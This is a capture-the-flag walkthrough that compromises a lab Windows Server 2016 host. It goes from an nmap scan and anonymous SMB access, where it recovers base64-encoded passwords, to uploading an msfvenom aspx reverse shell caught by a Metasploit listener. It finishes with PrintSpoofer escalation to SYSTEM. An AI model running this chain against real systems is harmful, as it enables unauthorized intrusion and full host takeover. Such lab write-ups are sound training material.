First, we will begin with our usual nmap scan to see where we can start looking.
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 04:18 CET Nmap scan report for 10.10.218.69 Host is up (0.093s latency). Not shown: 995 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server? | ssl-cert: Subject: commonName=Relevant | Not valid before: 2021-12-21T03:13:52 |_Not valid after: 2022-06-22T03:13:52 | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2021-12-22T03:20:37+00:00 |_ssl-date: 2021-12-22T03:21:15+00:00; 0s from scanner time. Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2021-12-22T03:20:37 |_ start_date: 2021-12-22T03:14:38 | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT | Workgroup: WORKGROUP |_ System time: 2021-12-21T19:20:39-08:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 140.73 seconds
From this, we see the web application is running on Microsoft Server IIS, not too bad.
Another important thing, looks like samba is also running without authentication.
Looks like samba is running without authentication enabled and there's also an interesting share.
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC nt4wrksv Disk
Now we just have to connect to it and see what's happening.
Password for [WORKGROUP\max]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jul 25 23:46:04 2020 .. D 0 Sat Jul 25 23:46:04 2020 passwords.txt A 98 Sat Jul 25 17:15:33 2020 7735807 blocks of size 4096. 4945463 blocks available smb: \> cat passwords.txt cat: command not found smb: \> get passwords.txt getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Looks like we are lucky, we got a encrypted passwords text file, so let's see what's in it.
User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Now that we have encoded passwords, we need to decrypt them. For that I used this website.
After decoding both, we are left with 2 users:
Scanning a little more, I didn't find anywhere to use these credentials, so I started digging a bit.
After another nmap scan, this time with the -p- flag, we find another http port 49663 with a directory same name as the share. This means we can easily upload a reverse shell and invoke it going to the page. So first, let's generate the reverse shell payload.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 200262 bytes Final size of aspx file: 1010404 bytes Saved as: 1337.aspx
Perfect, so before uploading that to the SMB share we need to start a listener with metasploit.
, , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v6.1.8-dev ] + -- --=[ 2167 exploits - 1149 auxiliary - 397 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ] Metasploit tip: Writing a custom module? After editing your module, why not try the reload command msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.8.208.63 LHOST => 10.8.208.63 msf6 exploit(multi/handler) > set LPORT 1337 LPORT => 1337 msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.8.208.63:1337
Now we can finally connect to the share, upload our payload and get the reverse shell in meterpreter navigating to the webpage.
msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.8.208.63:1337 [*] Meterpreter session 7 opened (10.8.208.63:1337 -> 10.10.232.253:49773) at 2021-12-22 05:24:46 +0100 meterpreter > whoami /priv [-] Unknown command: whoami meterpreter > shell Process 2284 created. Channel 1 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled c:\windows\system32\inetsrv>whoami whoami iis apppool\defaultapppool c:\windows\system32\inetsrv>
Looks like we are finally inside the server, now go grab the user flag at C:\Users\Bob\Desktop\user.txt and let's move to getting root.
So we are now inside the server with a user called iis apppool\defaultapppool.
Taking a closer look at the privileges we have, SeImpersonatePrivilege is kinda suspicious, and that's because there's a famous exploit called PrintSpoofer that abuses that privilege to escalate privileges.
First, let's get the exe from here and upload it to the SMB share again.
After that, we just navigate to the share directory inside our reverse shell and execute the file.
PrintSpoofer.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\system PS C:\Windows\system32>
Well, looks like that's it. Just go and grab the flag at C:\Users\Administrator\Desktop\root.txt.
Hope you enjoyed it!